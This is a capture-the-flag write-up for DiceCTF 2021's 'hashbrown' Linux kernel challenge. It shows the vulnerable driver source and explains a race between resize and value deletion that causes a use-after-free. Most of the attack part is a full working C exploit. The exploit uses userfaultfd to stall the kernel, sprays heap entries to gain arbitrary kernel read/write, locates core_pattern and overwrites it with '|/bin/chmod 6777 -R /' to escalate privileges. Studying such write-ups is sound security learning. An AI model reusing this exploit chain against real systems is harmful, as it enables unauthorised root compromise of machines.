DiceCTF2021 hashbrown
Table of Contents
Problem⌗
Environment⌗
- linux version:
5.11.0-rc3- CONFIG_SLAB_FREELIST_RANDOM=y
- CONFIG_SLAB=y
- CONFIG_FG_KASLR=y
- unprivileged_userfaultfd: 1
- unprivileged_bpf_disabled: 0
Module⌗
#include <linux/device.h>
#include <linux/fs.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/mutex.h>
#include <linux/slab.h>
#include <linux/uaccess.h>
#define DEVICE_NAME "hashbrown"
#define CLASS_NAME "hashbrown"
MODULE_AUTHOR("FizzBuzz101");
MODULE_DESCRIPTION("Here's a hashbrown for everyone!");
MODULE_LICENSE("GPL");
#define ADD_KEY 0x1337
#define DELETE_KEY 0x1338
#define UPDATE_VALUE 0x1339
#define DELETE_VALUE 0x133a
#define GET_VALUE 0x133b
#define SIZE_ARR_START 0x10
#define SIZE_ARR_MAX 0x200
#define MAX_ENTRIES 0x400
#define MAX_VALUE_SIZE 0xb0
#define GET_THRESHOLD(size) size - (size >> 2)
#define INVALID 1
#define EXISTS 2
#define NOT_EXISTS 3
#define MAXED 4
static DEFINE_MUTEX(operations_lock);
static DEFINE_MUTEX(resize_lock);
static long hashmap_ioctl(struct file *file, unsigned int cmd,
unsigned long arg);
static int major;
static struct class *hashbrown_class = NULL;
static struct device *hashbrown_device = NULL;
static struct file_operations hashbrown_fops = {.unlocked_ioctl =
hashmap_ioctl};
typedef struct {
uint32_t key;
uint32_t size;
char *src;
char *dest;
} request_t;
struct hash_entry {
uint32_t key;
uint32_t size;
char *value;
struct hash_entry *next;
};
typedef struct hash_entry hash_entry;
typedef struct {
uint32_t size;
uint32_t threshold;
uint32_t entry_count;
hash_entry **buckets;
} hashmap_t;
hashmap_t hashmap;
static noinline uint32_t get_hash_idx(uint32_t key, uint32_t size);
static noinline long resize(request_t *arg);
static noinline void resize_add(uint32_t idx, hash_entry *entry,
hash_entry **new_buckets);
static noinline void resize_clean_old(void);
static noinline long add_key(uint32_t idx, uint32_t key, uint32_t size,
char *src);
static noinline long delete_key(uint32_t idx, uint32_t key);
static noinline long update_value(uint32_t idx, uint32_t key, uint32_t size,
char *src);
static noinline long delete_value(uint32_t idx, uint32_t key);
static noinline long get_value(uint32_t idx, uint32_t key, uint32_t size,
char *dest);
#pragma GCC push_options
#pragma GCC optimize("O1")
static long hashmap_ioctl(struct file *file, unsigned int cmd,
unsigned long arg) {
long result;
request_t request;
uint32_t idx;
if (cmd == ADD_KEY) {
if (hashmap.entry_count == hashmap.threshold &&
hashmap.size < SIZE_ARR_MAX) {
mutex_lock(&resize_lock);
result = resize((request_t *)arg);
mutex_unlock(&resize_lock);
return result;
}
}
mutex_lock(&operations_lock);
if (copy_from_user((void *)&request, (void *)arg, sizeof(request_t))) {
result = INVALID;
} else if (cmd == ADD_KEY && hashmap.entry_count == MAX_ENTRIES) {
result = MAXED;
} else {
idx = get_hash_idx(request.key, hashmap.size);
switch (cmd) {
case ADD_KEY:
result = add_key(idx, request.key, request.size, request.src);
break;
case DELETE_KEY:
result = delete_key(idx, request.key);
break;
case UPDATE_VALUE:
result = update_value(idx, request.key, request.size, request.src);
break;
case DELETE_VALUE:
result = delete_value(idx, request.key);
break;
case GET_VALUE:
result = get_value(idx, request.key, request.size, request.dest);
break;
default:
result = INVALID;
break;
}
}
mutex_unlock(&operations_lock);
return result;
}
static uint32_t get_hash_idx(uint32_t key, uint32_t size) {
uint32_t hash;
key ^= (key >> 20) ^ (key >> 12);
hash = key ^ (key >> 7) ^ (key >> 4);
return hash & (size - 1);
}
static noinline void resize_add(uint32_t idx, hash_entry *entry,
hash_entry **new_buckets) {
if (!new_buckets[idx]) {
new_buckets[idx] = entry;
} else {
entry->next = new_buckets[idx];
new_buckets[idx] = entry;
}
}
static noinline void resize_clean_old() {
int i;
hash_entry *traverse, *temp;
for (i = 0; i < hashmap.size; i++) {
if (hashmap.buckets[i]) {
traverse = hashmap.buckets[i];
while (traverse) {
temp = traverse;
traverse = traverse->next;
kfree(temp);
}
hashmap.buckets[i] = NULL;
}
}
kfree(hashmap.buckets);
hashmap.buckets = NULL;
return;
}
static long resize(request_t *arg) {
hash_entry **new_buckets, *temp_entry, *temp;
request_t request;
char *temp_data;
uint32_t new_size, new_threshold, new_idx;
int i, duplicate;
if (copy_from_user((void *)&request, (void *)arg, sizeof(request_t))) {
return INVALID;
}
if (request.size < 1 || request.size > MAX_VALUE_SIZE) {
return INVALID;
}
new_size = hashmap.size * 2;
new_threshold = GET_THRESHOLD(new_size);
new_buckets = kzalloc(sizeof(hash_entry *) * new_size, GFP_KERNEL);
if (!new_buckets) {
return INVALID;
}
duplicate = 0;
for (i = 0; i < hashmap.size; i++) {
if (hashmap.buckets[i]) {
for (temp_entry = hashmap.buckets[i]; temp_entry != NULL;
temp_entry = temp_entry->next) {
if (temp_entry->key == request.key) {
duplicate = 1;
}
new_idx = get_hash_idx(temp_entry->key, new_size);
temp = kzalloc(sizeof(hash_entry), GFP_KERNEL);
if (!temp) {
kfree(new_buckets);
return INVALID;
}
temp->key = temp_entry->key;
temp->size = temp_entry->size;
temp->value = temp_entry->value;
resize_add(new_idx, temp, new_buckets);
}
}
}
if (!duplicate) {
new_idx = get_hash_idx(request.key, new_size);
temp = kzalloc(sizeof(hash_entry), GFP_KERNEL);
if (!temp) {
kfree(new_buckets);
return INVALID;
}
temp_data = kzalloc(request.size, GFP_KERNEL);
if (!temp_data) {
kfree(temp);
kfree(new_buckets);
return INVALID;
}
if (copy_from_user(temp_data, request.src, request.size)) {
kfree(temp_data);
kfree(temp);
kfree(new_buckets);
return INVALID;
}
temp->size = request.size;
temp->value = temp_data;
temp->key = request.key;
temp->next = NULL;
resize_add(new_idx, temp, new_buckets);
hashmap.entry_count++;
}
resize_clean_old();
hashmap.size = new_size;
hashmap.threshold = new_threshold;
hashmap.buckets = new_buckets;
return (duplicate) ? EXISTS : 0;
}
static long add_key(uint32_t idx, uint32_t key, uint32_t size, char *src) {
hash_entry *temp_entry, *temp;
char *temp_data;
if (size < 1 || size > MAX_VALUE_SIZE) {
return INVALID;
}
temp_entry = kzalloc(sizeof(hash_entry), GFP_KERNEL);
temp_data = kzalloc(size, GFP_KERNEL);
if (!temp_entry || !temp_data) {
return INVALID;
}
if (copy_from_user(temp_data, src, size)) {
return INVALID;
}
temp_entry->key = key;
temp_entry->size = size;
temp_entry->value = temp_data;
temp_entry->next = NULL;
if (!hashmap.buckets[idx]) {
hashmap.buckets[idx] = temp_entry;
hashmap.entry_count++;
return 0;
} else {
for (temp = hashmap.buckets[idx]; temp->next != NULL; temp = temp->next) {
if (temp->key == key) {
kfree(temp_data);
kfree(temp_entry);
return EXISTS;
}
}
if (temp->key == key) {
kfree(temp_data);
kfree(temp_entry);
return EXISTS;
}
temp->next = temp_entry;
hashmap.entry_count++;
return 0;
}
}
static long delete_key(uint32_t idx, uint32_t key) {
hash_entry *temp, *prev;
if (!hashmap.buckets[idx]) {
return NOT_EXISTS;
}
if (hashmap.buckets[idx]->key == key) {
temp = hashmap.buckets[idx]->next;
if (hashmap.buckets[idx]->value) {
kfree(hashmap.buckets[idx]->value);
}
kfree(hashmap.buckets[idx]);
hashmap.buckets[idx] = temp;
hashmap.entry_count--;
return 0;
}
temp = hashmap.buckets[idx];
while (temp != NULL && temp->key != key) {
prev = temp;
temp = temp->next;
}
if (temp == NULL) {
return NOT_EXISTS;
}
prev->next = temp->next;
if (temp->value) {
kfree(temp->value);
}
kfree(temp);
hashmap.entry_count--;
return 0;
}
static long update_value(uint32_t idx, uint32_t key, uint32_t size, char *src) {
hash_entry *temp;
char *temp_data;
if (size < 1 || size > MAX_VALUE_SIZE) {
return INVALID;
}
if (!hashmap.buckets[idx]) {
return NOT_EXISTS;
}
for (temp = hashmap.buckets[idx]; temp != NULL; temp = temp->next) {
if (temp->key == key) {
if (temp->size != size) {
if (temp->value) {
kfree(temp->value);
}
temp->value = NULL;
temp->size = 0;
temp_data = kzalloc(size, GFP_KERNEL);
if (!temp_data || copy_from_user(temp_data, src, size)) {
return INVALID;
}
temp->size = size;
temp->value = temp_data;
} else {
if (copy_from_user(temp->value, src, size)) {
return INVALID;
}
}
return 0;
}
}
return NOT_EXISTS;
}
static long delete_value(uint32_t idx, uint32_t key) {
hash_entry *temp;
if (!hashmap.buckets[idx]) {
return NOT_EXISTS;
}
for (temp = hashmap.buckets[idx]; temp != NULL; temp = temp->next) {
if (temp->key == key) {
if (!temp->value || !temp->size) {
return NOT_EXISTS;
}
kfree(temp->value);
temp->value = NULL;
temp->size = 0;
return 0;
}
}
return NOT_EXISTS;
}
static long get_value(uint32_t idx, uint32_t key, uint32_t size, char *dest) {
hash_entry *temp;
if (!hashmap.buckets[idx]) {
return NOT_EXISTS;
}
for (temp = hashmap.buckets[idx]; temp != NULL; temp = temp->next) {
if (temp->key == key) {
if (!temp->value || !temp->size) {
return NOT_EXISTS;
}
if (size > temp->size) {
return INVALID;
}
if (copy_to_user(dest, temp->value, size)) {
return INVALID;
}
return 0;
}
}
return NOT_EXISTS;
}
#pragma GCC pop_options
static int __init init_hashbrown(void) {
major = register_chrdev(0, DEVICE_NAME, &hashbrown_fops);
if (major < 0) {
return -1;
}
hashbrown_class = class_create(THIS_MODULE, CLASS_NAME);
if (IS_ERR(hashbrown_class)) {
unregister_chrdev(major, DEVICE_NAME);
return -1;
}
hashbrown_device =
device_create(hashbrown_class, 0, MKDEV(major, 0), 0, DEVICE_NAME);
if (IS_ERR(hashbrown_device)) {
class_destroy(hashbrown_class);
unregister_chrdev(major, DEVICE_NAME);
return -1;
}
mutex_init(&operations_lock);
mutex_init(&resize_lock);
hashmap.size = SIZE_ARR_START;
hashmap.entry_count = 0;
hashmap.threshold = GET_THRESHOLD(hashmap.size);
hashmap.buckets = kzalloc(sizeof(hash_entry *) * hashmap.size, GFP_KERNEL);
printk(KERN_INFO "HashBrown Loaded! Who doesn't love Hashbrowns!\n");
return 0;
}
static void __exit exit_hashbrown(void) {
device_destroy(hashbrown_class, MKDEV(major, 0));
class_unregister(hashbrown_class);
class_destroy(hashbrown_class);
unregister_chrdev(major, DEVICE_NAME);
mutex_destroy(&operations_lock);
mutex_destroy(&resize_lock);
printk(KERN_INFO "HashBrown Unloaded\n");
}
module_init(init_hashbrown);
module_exit(exit_hashbrown);This module allow us to add, delete and update key and value to hashmap.
Vulnerability⌗
The vulnerability is easy, a race condition can be occurs in hashmap_ioctl function:
static long hashmap_ioctl(struct file *file, unsigned int cmd,
unsigned long arg) {
long result;
request_t request;
uint32_t idx;
if (cmd == ADD_KEY) {
if (hashmap.entry_count == hashmap.threshold &&
hashmap.size < SIZE_ARR_MAX) {
mutex_lock(&resize_lock);
result = resize((request_t *)arg);
mutex_unlock(&resize_lock);
return result;
}
}
mutex_lock(&operations_lock);
if (copy_from_user((void *)&request, (void *)arg, sizeof(request_t))) {
result = INVALID;
} else if (cmd == ADD_KEY && hashmap.entry_count == MAX_ENTRIES) {
result = MAXED;
} else {
idx = get_hash_idx(request.key, hashmap.size);
switch (cmd) {
// ...
}
}
mutex_unlock(&operations_lock);
return result;
}
As we can see, we can trigger resize function and other modification functions.
And in resize function, there is a entry-copy mechanism which allocate new heap chunk and copy old entry’s data to new one.
After copying, delete old hashmap’s bucket using resize_clean_old and set hashmap’s bucket to new one:
static long resize(request_t *arg) {
hash_entry **new_buckets, *temp_entry, *temp;
request_t request;
char *temp_data;
uint32_t new_size, new_threshold, new_idx;
int i, duplicate;
// ...
duplicate = 0;
for (i = 0; i < hashmap.size; i++) {
if (hashmap.buckets[i]) {
for (temp_entry = hashmap.buckets[i]; temp_entry != NULL;
temp_entry = temp_entry->next) {
if (temp_entry->key == request.key) {
duplicate = 1;
}
new_idx = get_hash_idx(temp_entry->key, new_size);
temp = kzalloc(sizeof(hash_entry), GFP_KERNEL);
if (!temp) {
kfree(new_buckets);
return INVALID;
}
temp->key = temp_entry->key;
temp->size = temp_entry->size;
temp->value = temp_entry->value;
resize_add(new_idx, temp, new_buckets);
}
}
}
if (!duplicate) {
new_idx = get_hash_idx(request.key, new_size);
temp = kzalloc(sizeof(hash_entry), GFP_KERNEL);
if (!temp) {
kfree(new_buckets);
return INVALID;
}
temp_data = kzalloc(request.size, GFP_KERNEL);
if (!temp_data) {
kfree(temp);
kfree(new_buckets);
return INVALID;
}
if (copy_from_user(temp_data, request.src, request.size)) {
kfree(temp_data);
kfree(temp);
kfree(new_buckets);
return INVALID;
}
temp->size = request.size;
temp->value = temp_data;
temp->key = request.key;
temp->next = NULL;
resize_add(new_idx, temp, new_buckets);
hashmap.entry_count++;
}
resize_clean_old();
hashmap.size = new_size;
hashmap.threshold = new_threshold;
hashmap.buckets = new_buckets;
return (duplicate) ? EXISTS : 0;
}
Exploit⌗
Make UAF and get controlled entry⌗
So, if we delete the value after copying and before resize_clean_old, there will be freed value in new bucket.
Since size of hash_entry is 0x20, we can get controll to entry with freed value in new bucket (see construct_corrupted_entry).
AAR/AAW⌗
In hash_entry, size and value member exist. So we can make AAR and AAW primitives using them (see aar and aaw).
Find core_pattern and overwrite it⌗
Although we can read and write at arbitrary address, there is a limit to do reading because of __check_object_size.
But, I can leak some address in kernel area (see find_kernel_address). And using it, I can find kernel base (see find_core_pattern_address and the few lines after calling it).
Then since we can read and write at arbitrary address and we know the core_pattern address, overwrite core_pattern with “|/bin/chmod 6777 -R /”.
Exploit code⌗
#define _GNU_SOURCE
#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <unistd.h>
static void get_enter_to_continue(const char* msg);
static void fatal(const char* msg);
static int register_uffd(void* addr, size_t len, void* (*handler)(void*));
static void get_enter_to_continue(const char* msg) {
puts(msg);
getchar();
}
static void fatal(const char* msg) {
perror(msg);
// get_enter_to_continue("Press enter to exit...");
exit(-1);
}
static int register_uffd(void* addr, size_t len, void* (*handler)(void*)) {
struct uffdio_api uffdio_api;
struct uffdio_register uffdio_register;
pthread_t th;
int uffd = syscall(__NR_userfaultfd, __O_CLOEXEC | O_NONBLOCK);
if (uffd < 0) {
fatal("syscall(__NR_userfaultfd)");
}
uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if (ioctl(uffd, UFFDIO_API, &uffdio_api) < 0) {
fatal("ioctl(UFFDIO_API)");
}
uffdio_register.range.start = (uint64_t)addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) < 0) {
fatal("ioctl(UFFDIO_REGISTER)");
}
if (pthread_create(&th, NULL, handler, (void*)(uint64_t)uffd) < 0) {
fatal("pthread_create");
}
return uffd;
}
#define VULN_DEV_NAME "hashbrown"
#define VULN_DEV_CMD_ADD_KEY 0x1337
#define VULN_DEV_CMD_DELETE_KEY 0x1338
#define VULN_DEV_CMD_UPDATE_VALUE 0x1339
#define VULN_DEV_CMD_DELETE_VALUE 0x133a
#define VULN_DEV_CMD_GET_VALUE 0x133b
#define VULN_DEV_CONST_SIZE_ARR_START 0x10
#define VULN_DEV_CONST_SIZE_ARR_MAX 0x200
#define VULN_DEV_CONST_MAX_ENTRIES 0x400
#define VULN_DEV_CONST_MAX_VALUE_SIZE 0xb0
#define VULN_DEV_GET_THRESHOLD(size) (size - (size >> 2))
#define VULN_DEV_RESULT_INVALID 1
#define VULN_DEV_RESULT_EXISTS 2
#define VULN_DEV_RESULT_NOT_EXISTS 3
#define VULN_DEV_RESULT_MAXED 4
typedef struct {
uint32_t key;
uint32_t size;
char* src;
char* dest;
} request_t;
static int vuln_dev_add_key(uint32_t key, void* src, uint32_t size);
static int vuln_dev_delete_key(uint32_t key);
static int vuln_dev_update_value(uint32_t key, void* src, uint32_t size);
static int vuln_dev_delete_value(uint32_t key);
static int vuln_dev_get_value(uint32_t key, void* out, uint32_t size);
static uint32_t get_hash_idx_from_key(uint32_t key, uint32_t size);
static void calculate_hash_collision(uint32_t* out, size_t out_size,
uint32_t hash, uint32_t size);
int vuln_fd = 0;
static int vuln_dev_add_key(uint32_t key, void* src, uint32_t size) {
request_t req = {.key = key, .size = size, .src = (char*)src, .dest = NULL};
return ioctl(vuln_fd, VULN_DEV_CMD_ADD_KEY, &req);
}
static int vuln_dev_delete_key(uint32_t key) {
request_t req = {.key = key, .size = 0, .src = NULL, .dest = NULL};
return ioctl(vuln_fd, VULN_DEV_CMD_DELETE_KEY, &req);
}
static int vuln_dev_update_value(uint32_t key, void* src, uint32_t size) {
request_t req = {.key = key, .size = size, .src = (char*)src, .dest = NULL};
return ioctl(vuln_fd, VULN_DEV_CMD_UPDATE_VALUE, &req);
}
static int vuln_dev_delete_value(uint32_t key) {
request_t req = {.key = key, .size = 0, .src = NULL, .dest = NULL};
return ioctl(vuln_fd, VULN_DEV_CMD_DELETE_VALUE, &req);
}
static int vuln_dev_get_value(uint32_t key, void* dest, uint32_t size) {
request_t req = {.key = key, .size = size, .src = NULL, .dest = (char*)dest};
return ioctl(vuln_fd, VULN_DEV_CMD_GET_VALUE, &req);
}
static uint32_t get_hash_idx_from_key(uint32_t key, uint32_t size) {
uint32_t hash;
key ^= (key >> 20) ^ (key >> 12);
hash = key ^ (key >> 7) ^ (key >> 4);
return hash & (size - 1);
}
static void calculate_hash_collision(uint32_t* out, size_t out_size,
uint32_t hash, uint32_t size) {
if (hash >= size) {
fatal("calculate_hash_collision: hash >= size");
}
uint32_t* p = out;
const uint32_t* const last_p = p + out_size;
for (uint32_t cur_key = 0; cur_key <= 0xffffffff; ++cur_key) {
const uint32_t cur_hash = get_hash_idx_from_key(cur_key, size);
if (cur_hash != hash) {
continue;
}
*p++ = cur_key;
if (p == last_p) {
break;
}
}
}
#define KERNEL_BASE_START 0xffffffff81000000
#define KERNEL_BASE_END 0xffffffffc0000000
#define IS_IN_KERNEL_BASE_RANGE(x) \
(KERNEL_BASE_START <= (x) && (x) <= KERNEL_BASE_END)
#define KERNEL_MODULE_START 0xffffffffc0000000
#define KERNEL_MODPROBE_OFFSET (0xa46fe0)
#define KERNEL_CORE_PATTERN_OFFSET (0xb0cd00)
#define KERNEL_START_SYMTAB_OFFSET (0x990940)
#define KERNEL_MODULE_HASHMAP_OFFSET (0x2540)
static void entry_spray(uint32_t idx, void* data, size_t size);
static void* pthread_entry_spray(void* arg);
static uint64_t construct_corrupted_entry();
static uint64_t leak_heap_address();
static void aar(void* out, uint64_t addr, size_t size);
static void aaw(uint64_t addr, void* data, size_t size);
static uint64_t aar64(uint64_t addr);
static void aaw64(uint64_t addr, uint64_t val);
static uint64_t find_kernel_address(uint64_t heap_addr);
static uint64_t find_module_base();
static uint64_t find_core_pattern_address(uint64_t kernel_addr);
static void entry_spray(uint32_t idx, void* data, size_t size) {
uint32_t keys[512];
calculate_hash_collision(keys, 512, idx, VULN_DEV_CONST_SIZE_ARR_MAX);
for (int i = 0; i < 512; ++i) {
vuln_dev_add_key(keys[i], data, size);
}
}
static void* pthread_entry_spray(void* arg) {
uint32_t idx = *(uint32_t*)(arg);
void* data = (void*)*(uint64_t*)(arg + 8);
size_t size = *(size_t*)(arg + 16);
uint32_t keys[512];
entry_spray(idx, data, size);
}
cpu_set_t target_cpu;
uint32_t collision_keys[VULN_DEV_CONST_SIZE_ARR_MAX];
static void* userfault_handler_for_construct_fake_entry(void* args) {
int uffd = (int)(long)args;
char* page = (char*)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (page == MAP_FAILED) {
fatal("userfault_handler_for_construct_fake_entry: mmap");
}
static struct uffd_msg msg;
struct uffdio_copy copy;
struct pollfd pollfd;
// puts(
// "[*] userfault_handler_for_construct_fake_entry: waiting for page "
// "fault...");
pollfd.fd = uffd;
pollfd.events = POLLIN;
while (poll(&pollfd, 1, -1) > 0) {
if (pollfd.revents & POLLERR || pollfd.revents & POLLHUP) {
fatal("userfault_handler_for_construct_fake_entry: poll");
}
if (read(uffd, &msg, sizeof(msg)) <= 0) {
fatal("userfault_handler_for_construct_fake_entry: read(uffd)");
}
if (msg.event != UFFD_EVENT_PAGEFAULT) {
fatal(
"userfault_handler_for_construct_fake_entry: msg.event != "
"UFFD_EVENT_PAGEFAULT");
}
// printf(
// "[*] userfault_handler_for_construct_fake_entry: addr=0x%llx, "
// "flag=0x%llx\n",
// msg.arg.pagefault.address, msg.arg.pagefault.flags);
// Main Routine
puts("[+] UFFD: Deleting values...");
uint32_t cur_size = VULN_DEV_CONST_SIZE_ARR_MAX / 2;
uint32_t cur_threshold = VULN_DEV_GET_THRESHOLD(cur_size);
for (int i = 0; i <= cur_threshold + 1; ++i) {
vuln_dev_delete_value(collision_keys[i]);
}
copy.src = (uint64_t)page; // data of page will be data of faulted page
copy.dst = (uint64_t)msg.arg.pagefault.address;
copy.len = 0x1000;
copy.mode = 0;
copy.copy = 0;
if (ioctl(uffd, UFFDIO_COPY, ©) < 0) {
fatal("userfault_handler_for_construct_fake_entry: ioctl(UFFDIO_COPY)");
}
break;
}
munmap(page, 0x1000);
return NULL;
}
static uint64_t construct_corrupted_entry() {
char data[0x20];
uint64_t* uint64_data = (uint64_t*)data;
memset(data, 'a', 0x20);
uint32_t target_idx = 0;
uint32_t cur_size = VULN_DEV_CONST_SIZE_ARR_MAX / 2;
uint32_t cur_threshold = VULN_DEV_GET_THRESHOLD(cur_size);
calculate_hash_collision(collision_keys, 512, target_idx,
VULN_DEV_CONST_SIZE_ARR_MAX);
puts("[*] Adding keys...");
for (int i = 0; i < cur_threshold; ++i) {
vuln_dev_add_key(collision_keys[i], data, sizeof(data));
}
void* uffd_page = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
int uffd = register_uffd(uffd_page, 0x1000,
userfault_handler_for_construct_fake_entry);
puts("[*] Trigger `resize` and deleting values...");
vuln_dev_add_key(collision_keys[cur_threshold + 1], uffd_page, sizeof(data));
puts("[*] Spraying entries...");
{
entry_spray(1, data, 0x20);
pthread_t th;
uint64_t arg[3] = {2, (uint64_t)data, 0x20};
pthread_create(&th, NULL, pthread_entry_spray, arg);
pthread_join(th, NULL);
}
puts("[*] Checking there is a corrupted entry...");
uint64_t entry_key = -1, backing_key = -1;
for (int i = 0; i <= cur_threshold + 1; ++i) {
uint32_t cur_key = collision_keys[i];
vuln_dev_get_value(collision_keys[i], data, 0x20);
if (*uint64_data == 0x6161616161616161 || (*uint64_data >> 32) != 0x20) {
continue;
}
entry_key = cur_key;
backing_key = (*uint64_data) & 0xffffffff;
break;
}
close(uffd);
munmap(uffd_page, 0x1000);
return (entry_key << 32) | backing_key;
}
uint32_t controller_key, backing_key;
uint64_t original_backing_ptr;
static uint64_t leak_heap_address() {
char data[0x20];
uint64_t* uint64_data = (uint64_t*)data;
vuln_dev_get_value(controller_key, data, 0x20);
return uint64_data[1];
}
static void aar(void* dest, uint64_t addr, size_t size) {
char data[0x20];
uint64_t* uint64_data = (uint64_t*)data;
uint64_data[0] = ((size & 0xffffffff) << 32) | backing_key;
uint64_data[1] = addr;
vuln_dev_update_value(controller_key, data, 0x10);
vuln_dev_get_value(backing_key, dest, size);
}
static void aaw(uint64_t addr, void* src, size_t size) {
char data[0x20];
uint64_t* uint64_data = (uint64_t*)data;
uint64_data[0] = ((size & 0xffffffff) << 32) | backing_key;
uint64_data[1] = addr;
vuln_dev_update_value(controller_key, data, 0x10);
vuln_dev_update_value(backing_key, src, size);
}
static uint64_t aar64(uint64_t addr) {
uint64_t val = -1;
aar(&val, addr, 8);
return val;
}
static void aaw64(uint64_t addr, uint64_t val) { return aaw(addr, &val, 8); }
static uint64_t find_kernel_address(uint64_t heap_addr) {
char data[0x1000];
uint64_t* uint64_data = (uint64_t*)data;
int sprays[0x1000];
for (int i = 0; i < 0x1000; ++i) {
sprays[i] = open("/proc/self/stat", O_RDONLY);
}
uint64_t addr = heap_addr - 0x8000;
uint64_t ret = -1;
while (addr <= heap_addr + 0x8000) {
uint64_t val = aar64(addr);
if (IS_IN_KERNEL_BASE_RANGE(val)) {
ret = val;
break;
}
addr += 8;
}
for (int i = 0; i < 0x1000; ++i) {
close(sprays[i]);
}
return ret;
}
static uint64_t find_module_base() {
uint64_t addr = KERNEL_MODULE_START;
while (addr <= KERNEL_MODULE_START + 0x10000 * 0x1000) {
uint64_t val = aar64(addr);
if (val != -1) {
return addr;
}
addr += 0x1000;
}
}
static uint64_t find_core_pattern_address(uint64_t kernel_addr) {
char data[0x20];
uint64_t maybe_kernel_base = kernel_addr & ~0xfffff;
uint64_t maybe_core_pattern_addr =
maybe_kernel_base + KERNEL_CORE_PATTERN_OFFSET;
uint64_t core_pattern_addr = -1;
while (core_pattern_addr == -1) {
aar(data, maybe_core_pattern_addr, 0x20);
if (!strcmp(data, "core")) {
core_pattern_addr = maybe_core_pattern_addr;
}
maybe_core_pattern_addr -= 0x100000;
}
return core_pattern_addr;
}
int main() {
vuln_fd = open("/dev/" VULN_DEV_NAME, O_RDONLY);
if (vuln_fd < 0) {
fatal("open(/dev/" VULN_DEV_NAME ")");
}
uint64_t entry_key_and_backing_key = construct_corrupted_entry();
controller_key = entry_key_and_backing_key >> 32;
backing_key = entry_key_and_backing_key & 0xffffffff;
original_backing_ptr = leak_heap_address();
printf(
"[+] Find corrupted entry! (controller_key=0x%08x, "
"backing_key=0x%08x; backing_ptr=0x%016lx)\n",
controller_key, backing_key, original_backing_ptr);
uint64_t kernel_address = find_kernel_address(original_backing_ptr);
printf("[+] kernel_address(not base): 0x%016lx\n", kernel_address);
uint64_t module_base = find_module_base();
printf("[+] module_base: 0x%016lx\n", module_base);
uint64_t core_pattern_address = find_core_pattern_address(kernel_address);
printf("[+] core_pattern_address: 0x%016lx\n", core_pattern_address);
uint64_t kernel_base = core_pattern_address - KERNEL_CORE_PATTERN_OFFSET;
printf("[+] kernel_base: 0x%016lx\n", kernel_base);
char new_core_pattern[] = "|/bin/chmod 6777 -R /";
printf("[*] Overwrite core_pattern to \"%s\"...\n", new_core_pattern);
aaw(core_pattern_address, new_core_pattern, sizeof(new_core_pattern));
puts("[*] Trigger core_pattern...");
uint64_t* evil = (uint64_t*)0xdeadbeefcafebebe;
*evil = 0;
return 0;
}